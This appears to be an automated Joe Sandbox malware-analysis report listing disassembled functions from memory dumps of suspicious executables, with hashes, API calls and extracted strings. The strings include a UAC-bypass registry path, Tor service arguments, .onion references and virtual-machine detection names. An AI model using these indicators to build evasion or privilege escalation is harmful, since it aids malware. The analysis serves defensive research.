Function 01B40918 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b98470512c9d62f3b230343e99066845fc00186ee46236dd97a5ec7258e2478e
Instruction ID: 9e4368d9d70830f5ffb3b9fdb406e7d6468211a06150547d5a2c6c760c50a7c5
Opcode Fuzzy Hash: b98470512c9d62f3b230343e99066845fc00186ee46236dd97a5ec7258e2478e
Instruction Fuzzy Hash: 7EE0DF34904208AFE725EBFCE10839A7EB8EB02300F0040ACE50893245DBB10A41A762

Uniqueness

Uniqueness Score: -1.00%

Function 01B485D0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d5b490aea2ceec8cda8b6a4c703e4790fb99c33009601d0d59bcf77a64d6b14
Instruction ID: 3de16bb829b564e8ca4af53ba2cb0a7d8902cbd1f766d9acf576256d86fb56fa
Opcode Fuzzy Hash: 0d5b490aea2ceec8cda8b6a4c703e4790fb99c33009601d0d59bcf77a64d6b14
Instruction Fuzzy Hash: FBE01A74E00208EFCB54DFE8D40469DBBB1FB48300F50C1A9D814A3300DB355A51DF85

Uniqueness

Uniqueness Score: -1.00%

Function 01B48690 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3373aa93095cc08fa7083a3bc77f14ca1469b77643435a464ee5ff367085038e
Instruction ID: f29e20ef283345e95204ffb328975b64d7fd371934118f80dfd9a845de17bda6
Opcode Fuzzy Hash: 3373aa93095cc08fa7083a3bc77f14ca1469b77643435a464ee5ff367085038e
Instruction Fuzzy Hash: A1E01A34A02109EFDB54EFA8E58459D7BB0EB09311F4441D9E80867261DB342D5DEF50

Uniqueness

Uniqueness Score: -1.00%

Function 01B40868 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9773653bd6cecbd2b7907ef19d8202bc241df47c0c90a1b556615f1f0e2b5fd1
Instruction ID: 079bc1a18c7773b3c8630b3b37483f017d4b39bb0236db13720e4e8705d8064f
Opcode Fuzzy Hash: 9773653bd6cecbd2b7907ef19d8202bc241df47c0c90a1b556615f1f0e2b5fd1
Instruction Fuzzy Hash: 63E0C2381453054FD3656BF8E8187AB7B70EF46320F05865EE80983591CB2449028B62

Uniqueness

Uniqueness Score: -1.00%

Function 01B48440 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95e736e9d2e9e51990ebd9a63e283d250b230a4881410b9188364659346c262c
Instruction ID: 2507dc7061522dcdf7e9bf983047133db1b0ce0a9fb959023a42687d092360cc
Opcode Fuzzy Hash: 95e736e9d2e9e51990ebd9a63e283d250b230a4881410b9188364659346c262c
Instruction Fuzzy Hash: F4E0EC78911208AFCB54DFE8E84569DBFF4AB04211F1041A9A90493240EB305A40DB41

Uniqueness

Uniqueness Score: -1.00%

Function 01B48380 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3401aa727918853336879aba9a8f76301e30dec66df5b788ac71aece6bab9c6f
Instruction ID: 739e32b5bf4af993127e48ac2f49afd1adb5edf90dd6af682c917f524082d2ea
Opcode Fuzzy Hash: 3401aa727918853336879aba9a8f76301e30dec66df5b788ac71aece6bab9c6f
Instruction Fuzzy Hash: 47D05E34901208DBCB18EFE8E44059EBF74EB45315F5082ECE90423350CB315E81EBC1

Uniqueness

Uniqueness Score: -1.00%

Function 01B40838 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 413565b8c3a802e0cdf17eb2d40895ca85dceeb99d8e97ae5618b84746fad963
Instruction ID: 04d6dc1aec8250f48f5e8270474b8fefeac7b269b67714afad5aa8d10120b842
Opcode Fuzzy Hash: 413565b8c3a802e0cdf17eb2d40895ca85dceeb99d8e97ae5618b84746fad963
Instruction Fuzzy Hash: ECD0A9344003048BE72A27A8BC092AA3BB09726722F08427AE94442062932404029BA2

Uniqueness

Uniqueness Score: -1.00%

Function 01B41EB3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a265cfa44d6075277036cd7d0fb9e4a3c760d658fab3f6390ccf981c24d75d0
Instruction ID: 75e9fcfcc16edad7f9d1c4f0c8820c3e8843a2ae81b9ff5e5d2b7cef40febdc7
Opcode Fuzzy Hash: 0a265cfa44d6075277036cd7d0fb9e4a3c760d658fab3f6390ccf981c24d75d0
Instruction Fuzzy Hash: 4AE09A78D00248CFCB14DFD8D8544ACBF71FB48350F10405AE9469B318D7341849EF00

Uniqueness

Uniqueness Score: -1.00%

Function 01B486A0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c03fb4df62a5d008e3b89a0af40c8d2c588bf001c08ff33e5661187c95d807e
Instruction ID: ce159d57c926e7be6798aac89e718cb190ee10644fe8a7e1a33f0fd4aca771f8
Opcode Fuzzy Hash: 0c03fb4df62a5d008e3b89a0af40c8d2c588bf001c08ff33e5661187c95d807e
Instruction Fuzzy Hash: 6BD05E3890120CEFC754EFE8E40969CBFB4EB04311F0041A8E80463350EB301E44DF81

Uniqueness

Uniqueness Score: -1.00%

Function 01B4A000 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08d09b49d2575fdcb9c7fc22295445454a2433c8d2bb25a774e5dfce5cdd6510
Instruction ID: 7a3f9197eec358c3dedbf2e4b51315595553500b1213ab918af1091205f7d4de
Opcode Fuzzy Hash: 08d09b49d2575fdcb9c7fc22295445454a2433c8d2bb25a774e5dfce5cdd6510
Instruction Fuzzy Hash: 2DD0C9316403089BEB265E75E919B257ED8EB18251F048465E50683251EF31D890AA52

Uniqueness

Uniqueness Score: -1.00%

Function 01B43BEE Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1e02633e772a876f90ec5ebb2ab2c45d45bfe58205873625d4a56863529f447
Instruction ID: 9a200b567072d81703b7b3c027e34e8c8baf6e80b27fceb4ee75e50d9e8cfca9
Opcode Fuzzy Hash: b1e02633e772a876f90ec5ebb2ab2c45d45bfe58205873625d4a56863529f447
Instruction Fuzzy Hash: 4DE0B634840628CFCBA4CF14DD94B99B7B1EB05306F0001D9A40AA2254CB301EC5CF04

Uniqueness

Uniqueness Score: -1.00%

Function 01B40848 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41865091ef1444b7ae2144a76c659c24572913cbb19b2f3acb3eb3a3aed03f79
Instruction ID: fb01092d5b15de4204d1aa38dea684fd7e33fdab437e910cd5baae772c5b0c20
Opcode Fuzzy Hash: 41865091ef1444b7ae2144a76c659c24572913cbb19b2f3acb3eb3a3aed03f79
Instruction Fuzzy Hash: 29B092781416098BEA2867E9B9087A97BA8A705326F885268B64C014649BB05091EBAA

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 05E60930 Relevance: 5.3, Strings: 4, Instructions: 336COMMON

Download Yara Rule

Strings

HERE, xrefs: 05E609B6
Gvq, xrefs: 05E60BBB
Gvq, xrefs: 05E60D19
LOOK, xrefs: 05E609B1

Memory Dump Source

Source File: 00000009.00000002.2248935817.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e60000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID: HERE$LOOK$Gvq$Gvq
API String ID: 0-802966049
Opcode ID: 6bb63a5b7c8d6b8f58666faf1f05632360c335f6b824c503c9dca4c610cbe15f
Instruction ID: 2377438e0f885cbbbf49bc8a48499490e2fe37636dad75e1d72341b562229fd6
Opcode Fuzzy Hash: 6bb63a5b7c8d6b8f58666faf1f05632360c335f6b824c503c9dca4c610cbe15f
Instruction Fuzzy Hash: 1FF1A074E452298FDB64CF69C988BDDBBF6BB48350F1092E6D409A7351DB30AE808F50

Uniqueness

Uniqueness Score: -1.00%

Function 05E60F14 Relevance: 9.0, Strings: 7, Instructions: 201COMMON

Download Yara Rule

Strings

LOOK, xrefs: 05E60F6A
Gvq, xrefs: 05E61243
HERE, xrefs: 05E60F6F
p<^q, xrefs: 05E61177
p<^q, xrefs: 05E6112C
HERE, xrefs: 05E61086
LOOK, xrefs: 05E61081

Memory Dump Source

Source File: 00000009.00000002.2248935817.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e60000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID: HERE$HERE$LOOK$LOOK$p<^q$p<^q$Gvq
API String ID: 0-792669839
Opcode ID: c8dc9b1585d474b0fb82ee7bef373094add1a71938e292400be0b010b464339d
Instruction ID: edba1fa1471de1a1cb06e3b5cbb8190209e4bbdcb2d94e8c5b5242656edd1369
Opcode Fuzzy Hash: c8dc9b1585d474b0fb82ee7bef373094add1a71938e292400be0b010b464339d
Instruction Fuzzy Hash: F7A1A174E402298FDB69DF69C988BD9B7B2BB48340F1491E9D54DAB360DB309E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01B4E000 Relevance: 7.7, Strings: 6, Instructions: 200COMMON

Download Yara Rule

Strings

4|cq, xrefs: 01B4E1F0
4'^q, xrefs: 01B4E0A6
4'^q, xrefs: 01B4E076
4'^q, xrefs: 01B4E01B
$^q, xrefs: 01B4E0C8
4|cq, xrefs: 01B4E20B

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4|cq$4|cq$$^q
API String ID: 0-1027864050
Opcode ID: 1d44df983a429fb03cea8b8587ed20b831dfd71f3da0832dfbcc1f9da609e8c1
Instruction ID: 6ba1e7c25439933d72c773ab6e7fb91a519d79d799f3357625904790699a19d6
Opcode Fuzzy Hash: 1d44df983a429fb03cea8b8587ed20b831dfd71f3da0832dfbcc1f9da609e8c1
Instruction Fuzzy Hash: 5B5190353401148FDB2D9F3D8859A2E7BE6FF88A4072584A9E512CB3A1DF79DC42DB81

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: KUc3lCE6xAEEreIlM0ct4583.exePID: 7648, Parent PID: 6984COMMON

Non-executed Functions

Function 00433840 Relevance: 12.7, Strings: 10, Instructions: 172COMMON

Download Yara Rule

Strings

runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 00433B27
bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t, xrefs: 00433A4A
%, xrefs: 00433B64
runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g , xrefs: 004339DB
runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st, xrefs: 00433B5B
,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos, xrefs: 00433A05
runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00433ACC
runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00433A71
VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu, xrefs: 00433AA5
CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return, xrefs: 00433B00

Memory Dump Source

Source File: 0000000A.00000002.2877683342.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2877683342.0000000000840000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2877683342.0000000000C77000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2877683342.0000000000C7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2877683342.0000000000CCF000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2877683342.0000000000CD3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2877683342.0000000000CEF000.00000040.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_KUc3lCE6xAEEreIlM0ct4583.jbxd

Yara matches

Similarity

API ID:
String ID: %$,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos$CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return$VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu$bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g
API String ID: 0-2845907608
Opcode ID: 4861b8a6a2a3058dc2e1ec19f5ab3598cb0c009544e4972bfa7db612a91145a9
Instruction ID: 54d86a38c7ca5e9b4d361dfb47ed8c6cf3eb888c171a558932b5f88d5bc68312
Opcode Fuzzy Hash: 4861b8a6a2a3058dc2e1ec19f5ab3598cb0c009544e4972bfa7db612a91145a9
Instruction Fuzzy Hash: 8281CFB45097018FD700EF66C18575AFBE0BF88708F41992EF49887392EB789949CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00443890 Relevance: 5.1, Strings: 4, Instructions: 81COMMON

Download Yara Rule

Strings

p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req, xrefs: 00443997
releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip, xrefs: 004439E1
m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr, xrefs: 0044394B
releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog, xrefs: 00443929

Memory Dump Source

Source File: 0000000A.00000002.2877683342.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2877683342.0000000000840000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2877683342.0000000000C77000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2877683342.0000000000C7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2877683342.0000000000CCF000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2877683342.0000000000CD3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2877683342.0000000000CEF000.00000040.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_KUc3lCE6xAEEreIlM0ct4583.jbxd

Yara matches

Similarity

API ID:
String ID: m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr$ p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req$releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip$releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
API String ID: 0-3530339137
Opcode ID: 147a754e04b331b36706bf54a1f15f1a33f6f9f3812af3793d82f5f849fb4b27
Instruction ID: 41eda2ad12dc9040aabd0b4fda58d31df6fc94468559f7c6cc3daccb715ab915
Opcode Fuzzy Hash: 147a754e04b331b36706bf54a1f15f1a33f6f9f3812af3793d82f5f849fb4b27
Instruction Fuzzy Hash: 9C31E2B45087418FD700EF25C185B1AFBE1BF88708F45882EF4888B352DB789948CB6A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Y8KGRj_sUjw5KjZpIoRDoSwV.exePID: 7656, Parent PID: 6984COMMON

Execution Graph

Execution Coverage:	21.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.9%
Total number of Nodes:	1514
Total number of Limit Nodes:	21

Executed Functions

Function 0040515C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 8ef9b48ed96d6a8df8db933101511442404bdd0abec70889978d036278c5d13e
Instruction ID: b78bf48cff894a3999656c5243e329942f020ab22272e2e872fdbeeaebf0035e
Opcode Fuzzy Hash: 8ef9b48ed96d6a8df8db933101511442404bdd0abec70889978d036278c5d13e
Instruction Fuzzy Hash: EDE09271B0021426D711A9699C86AEB735DDB58310F0006BFB904EB3C6EDB49E8046ED

Uniqueness

Uniqueness Score: -1.00%

Function 00408FC8 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00409061,?,?,?,?,00000000,?,00409B53), ref: 00408FE8
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408FEE
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00409061,?,?,?,?,00000000,?,00409B53), ref: 00409002
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00409008

Strings

kernel32.dll, xrefs: 00408FE3, 00408FFD
shell32.dll, xrefs: 00409034
Wow64DisableWow64FsRedirection, xrefs: 00408FDE
Wow64RevertWow64FsRedirection, xrefs: 00408FF8

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: 17e7db4c528402608d9f53e260f8b79ce616995abb8d95c1af2dd02ed3ed6c5c
Instruction ID: 9fcc65c531327f2d7efb14c601a25e4e420c6304718e48176e9e04a6a3b299d5
Opcode Fuzzy Hash: 17e7db4c528402608d9f53e260f8b79ce616995abb8d95c1af2dd02ed3ed6c5c
Instruction Fuzzy Hash: 6701DF70208300AEEB10AB76DC47B563AA8E782714F60843BF504B22C3CA7C5C44CA2E

Uniqueness

Uniqueness Score: -1.00%

Function 00409FB4 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A010
SetWindowLongA.USER32(00050440,000000FC,004097FC), ref: 0040A027

Part of subcall function 00406ADC: GetCommandLineA.KERNEL32(00000000,00406B20,?,?,?,?,00000000,?,0040A098,?), ref: 00406AF4

Part of subcall function 00409888: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,01F42C78,00409974,00000000,0040995B), ref: 004098F8
Part of subcall function 00409888: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,01F42C78,00409974,00000000), ref: 0040990C
Part of subcall function 00409888: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
Part of subcall function 00409888: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
Part of subcall function 00409888: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,01F42C78,00409974), ref: 00409940

RemoveDirectoryA.KERNEL32(00000000,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A113
